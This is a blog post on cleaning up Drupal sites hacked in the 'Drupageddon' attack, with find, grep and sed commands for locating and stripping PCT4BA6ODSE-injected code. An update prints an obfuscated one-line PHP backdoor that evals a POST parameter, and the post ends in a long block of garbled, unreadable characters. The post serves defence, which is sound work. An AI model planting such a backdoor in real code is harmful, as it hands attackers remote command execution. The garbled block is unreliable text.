Ways to recover a hacked Drupal system with 'PCT4BA6ODSE' in its PHP files

How to un-fudge a system after you've patched it for so-called "Drupageddon"
How to un-fudge a system after you've patched it for so-called "Drupageddon"

For those seeing 'PCT4BA6ODSE' in their PHP files - I have some easy commands to run for scrubbing your site out completely of these hacks (in case you do not have backups). This will not fix the underlying issue, but if you find that your PHP files have been devoured by the hackers this will at least clean up the files without damaging them.

This attack does two things: firstly, in creates NEW php files scattered throughout your directory structure. The files are all 494 bytes long, and end in "php" so they are easy to find. Run the following command to see if you have any:

find . -size 494c -name "*.php"

...and then run this command to delete them:

find . -size 494c -name "*.php" | xargs rm

And the second thing this exploit/attack does is alter EXISTING files with the malicious code. To see if any of your normal Drupal PHP files have been injected with this PCT4B code, go to the root of your site and issue the following command:

grep -Rl PCT4BA6ODSE .

This will look through your entire site, looking for instances of either newly-creately or pre-existing files that have been hacked with this variant - files that will now allow outside attackers to bounce commands off your server. Assuming the result of this command indeed lists affected files, you can then run this additional command:

grep -Rl PCT4BA6ODSE . | xargs sed -i 's/<[?]php.*PCT4BA6ODSE_.*[?]>/<\?php \/\/ RECOVERED FILE - more info at AllAboutTodd.com \?>/g'

This will sweep through all affected files, removing the malicious code but saving the rest of the file. Make sure you have backups of your system in case something goes wrong, etc etc etc...

People have been approaching me to help save their crusty, non-archived sites that were so ancient, and with HUNDREDS of affected files, that remediations of every PHP file would have taken me days. These simple commands did the trick.

Edit December 2014:

Here's another attack that has become popular, hopefully we don't need to start a list!

<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q6ae4d5'])){eval(${$s20}['q6ae4d5']);}?>

Edit March 2015:

More exploits may have been found. And the 494-byte files mentioned above are now 510 bytes, update your commands accordingly!

Still going... I have reports of patched sites (Drupal 7.32 and beyond) getting hacked now, but I suspect they were already hacked from before and the malicious code was lurking all this time. It seems these guys are smart enough to upload multiple exploits but to use only one family of scripts at a time, leaving others sleeping for later after we scrub the first round out.

One trick is to grep -Rl 'eval(' and look for files that end in php. There should be very few, and those you find better line up with the distribution Drupal code. Try https://www.drupal.org/project/hacked to be sure. And when you find small files with eval( and php, edit them and see if they are obfuscated. If so, nuke 'em.

Finding many more. Hacked sites coming out of the woodwork! Some client of mine are having trouble finding *all* the exploits, but they know approximately when the site was hacked. To search for php files that were created (or more specifically 'last modified' near a certain date, try this:

find . -type f -newermt 2014-10-01 ! -newermt 2014-10-31 -name "*.php"

This command will find all files (recursively) that end in .php (so they are executable from outside) which were last modified in the month of October. To search instead for when the permissions were changed, replace -newermt with -newerct

Here's what I found once I re-encoded one of these hacked files for extended characters - looks like China is hiding content in our Drupal directories ;^)

哛絓໥鼦婭芑쟝ံ驭㞻蹧𢡄黟쌸虦웲ꍂଦͿ뚣犜꠭覧둑�뫻�筆堽ᛖ䇛鴻笛鶽ꖩ䴟⤈㒅侠붘䪜ᅢ�ꏘ燰몞哓棵ᵠ翲਍﯇ྙ㤔慓邎弾쌚瞿焷샬꾡ྪ秤ҳ鲑筳柟犟輭덛⮔῝꠷䟦屇ว졁㷛ݰ袵ẩ錸㕸픗澶熢뵙돤씛콊욓靟윾俁ꁸ恝筹䪀坹바鼢쩱ᅿ㝦ᐮꥠ䁟Ә視ⷿ�䓁葛賍鉱ﮃ谎橸쫚q㒣㡅ᮬ휘鸬ᙨ᎞飊绻䮇뽖⇙ﳭ몤簜褔蛖ꄌ퀺㯩濉洫虷น␟괏㧳燋双嫁䖃籠㈄磌飊ش콨䤬暑妊☌Ֆ㱡⢆쪟ꃩ屜㷚㪛흴錨ぃ䆤롑쿓酖ᄶ욨䉐功꼢ඍ箍슊顲싆쪱倢⡯ﲏᦽᨘㆃ�䣜琘姠Ս깗끒ᅥ舫类嫷᥃十і陔ꩊ䷧蹱ꗹ揘ᖇ龌ﶟ䅃폧딿౓ದ実㄁�鶀轹ᛕ❜澽௒枡魑⹘뾘耣掫ା䉇귏䐘쭤膒䜘恧䂝쐰찔㔸䦁Ɔ㬜⯵퀬�점෸昊伄ꡢ憤�愄띝髾瘜⏋뵹﵊◎瑱㢐䱳്禽ꄼ᳍ﺐ�㶛臝벑ﻪ쭼災〺裧ऎ卧劝剭晣螘폓ﱧ䨯ഃꗜⒼꊤ覕紉븵梻೥䄅᧫쏏뀍髾깭�퉡瘞쐙薘굤Ḕ笫⭦켛﹒商埱旟螔싲뒢楐瓙䫞迯ꁵ뿣難론�㬅옝�㈹�탹┺ᾭ柲ﷱෂሚ홴䇉룿㒧鈼⡽諗ꠢ콲焕䯹鵤ࣲ�Ո暪㝘�桟鴲Ե꥞㻏樉ײַ䓔矝ᨙ⛐ᠣ훋ᑟ繌屜芨䫍話ᗖ�ڑ蹐໅螘਍鏙܆髆䨎郐씜苻瓱☏뢍烣⌹꽝䆎㲊ᐥ┫溎뮇䒛刴쌙腋괗̀☶縩篻攃왒ᯃ㋒쩵尓�öꯏ�옝噈ፊ䴙䚯葸ꤟ쨬筕ノ챘ᦾ熑틐蔂��൘ﴊꗙ꥕ﯖⳄ윂︷㼺�₼ዢ冇想鿅Õᴁm환䕌鳆碣契븉ꜜ脇棩킚Ὂ鼛勢艟套䙪馺ᰖ瓎荧濩Ӂ�䰙钇먪冠鷇㗭俗꾓䭍읕쌚덿❜ˢᇞ�䕱뗰⑭蚿瓐ⳟᕖל噃䕅펲캇Ⴆ啞嫘庑鴅呑韝⎌䤖ﯝ玳꓃ٙ퐵畸ᢵ႑잊䇐觼揅睑�먣鹄팅ⵧ਍꺾☕࣫Yᶹ垇ꂐ过캾匠ﳙ켷綬빻亁瀆蛆�섕鬗걈ၝ㍗쟄흂夀礣҆쪹붦ֽ幘❜꡸ℽ鍾᧐年犯ᐴ묣꯮틯휋↬홢๳㌡泷ေ袓ꕤö宱�㡨쬟祓鍞᥽軩礱ﵳ覆岵罜㈉�ᘭ것繳㏰糰쌍⇈絖ᒣ㢭垎쌘ᦜ�晬ᇄ㖏꒰䎩督ஞ噇蓦巬ݗ⭮츮태㼜䐎屐弧͐漻舛땻ݝ࿦﾿昫⤞놱䅃㧩鰈ꂕଜ総∋閼⸫䭀䍲膍鳞宷晄뀲魞눤�຀䛲冴惶䐂씻鯏⽎咇敁喵㾆㤻ᦝᬂ餗鐻ꑧퟰ﫩蝝�䚞ﻘ理䅧걤ꎦ懰賡毸屜롁ட뛄ಡ叱玼୵踄ᝥ਍柾坊鈁ᣚ軐⡐樇칅遈⍫꣌琶䮛䍸蓮዁ꮪ꡹୯왘❜Ⴟ柮太ꈤ፵Ա₴漓岵졜覗槚㴉⑕콸遖흙╏쓍량畱娿䣱⇈톢櫔娎䷦䴕氵ᇑ즻脼터茆⽢᩠욀邠悼邟細屜䌙霱쀕딡鬓웨�ࣹ嗮儆쭂蛻틭憈ు軔蚲劾

Tags: